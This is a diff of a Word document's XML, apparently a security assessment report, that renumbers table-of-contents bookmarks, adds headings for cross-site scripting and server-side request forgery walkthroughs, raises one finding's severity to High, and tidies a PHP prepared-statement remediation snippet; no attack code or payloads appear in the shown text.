                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325125 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393740 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2983,7 +2997,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325126" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393741" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3011,7 +3025,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325126 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393741 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3056,7 +3070,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325127" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393742" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3084,7 +3098,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325127 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393742 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3129,7 +3143,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325128" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393743" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3157,7 +3171,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325128 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393743 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3202,7 +3216,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325129" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393744" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3230,7 +3244,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325129 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393744 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3275,7 +3289,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325130" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393745" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3303,7 +3317,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325130 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393745 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3348,7 +3362,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325131" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393746" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3376,7 +3390,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325131 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393746 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3421,7 +3435,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325132" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393747" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3449,7 +3463,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325132 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393747 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3494,7 +3508,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325133" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393748" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3536,7 +3550,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325133 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393748 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3581,7 +3595,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325134" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393749" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3609,7 +3623,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325134 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393749 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3654,7 +3668,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325135" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393750" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3682,7 +3696,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325135 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393750 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3727,7 +3741,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325136" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393751" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3755,7 +3769,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325136 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393751 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3800,7 +3814,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325137" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393752" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3828,7 +3842,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325137 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393752 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3873,7 +3887,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325138" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393753" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3901,7 +3915,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325138 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393753 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3946,7 +3960,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325139" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393754" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3974,7 +3988,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325139 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393754 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4019,7 +4033,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325140" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393755" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4047,7 +4061,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325140 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393755 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4092,7 +4106,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325141" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393756" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4119,7 +4133,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325141 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393756 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4164,7 +4178,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325142" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393757" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4191,7 +4205,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325142 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393757 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4236,7 +4250,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71325143" w:history="1">
+          <w:hyperlink w:anchor="_Toc71393758" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4264,7 +4278,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71325143 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393758 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4285,6 +4299,297 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71393759" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Section 2 – stored cross-site scripting exploitation walkthrough</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393759 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71393760" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Exploitation 1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393760 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71393761" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Exploitation 2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393761 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:pos="9019"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71393762" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Section 3 – Server-side request forgery exploitation walkthrough</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71393762 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4321,7 +4626,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc71325099"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71393714"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Summary of Findings</w:t>
@@ -4719,6 +5024,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="109"/>
+        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1365" w:type="dxa"/>
@@ -4747,16 +5055,9 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>M</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>edium</w:t>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>High</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4949,7 +5250,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc71325100"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc71393715"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Detailed Findings</w:t>
@@ -4967,7 +5268,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc71325101"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71393716"/>
       <w:r>
         <w:t xml:space="preserve">Finding 1 - </w:t>
       </w:r>
@@ -5022,7 +5323,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="4" w:name="_Toc71325102"/>
+            <w:bookmarkStart w:id="4" w:name="_Toc71393717"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5353,7 +5654,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="5" w:name="_Proof_of_Concept"/>
-            <w:bookmarkStart w:id="6" w:name="_Toc71325103"/>
+            <w:bookmarkStart w:id="6" w:name="_Toc71393718"/>
             <w:bookmarkEnd w:id="5"/>
             <w:r>
               <w:rPr>
@@ -5513,7 +5814,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="7" w:name="_Toc71325104"/>
+            <w:bookmarkStart w:id="7" w:name="_Toc71393719"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5602,7 +5903,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="8" w:name="_Toc71325105"/>
+            <w:bookmarkStart w:id="8" w:name="_Toc71393720"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5698,7 +5999,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="9" w:name="_Toc71325106"/>
+            <w:bookmarkStart w:id="9" w:name="_Toc71393721"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5801,7 +6102,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="10" w:name="_Toc71325107"/>
+            <w:bookmarkStart w:id="10" w:name="_Toc71393722"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5888,7 +6189,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="11" w:name="_Toc71325108"/>
+            <w:bookmarkStart w:id="11" w:name="_Toc71393723"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5993,43 +6294,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = $con-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>prepare(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6057,61 +6322,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>bind_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>param</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"s", $_GET["username"]);</w:t>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6139,43 +6350,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>execute(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;execute();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6203,43 +6378,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>close(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;close();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6310,7 +6449,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71325109"/>
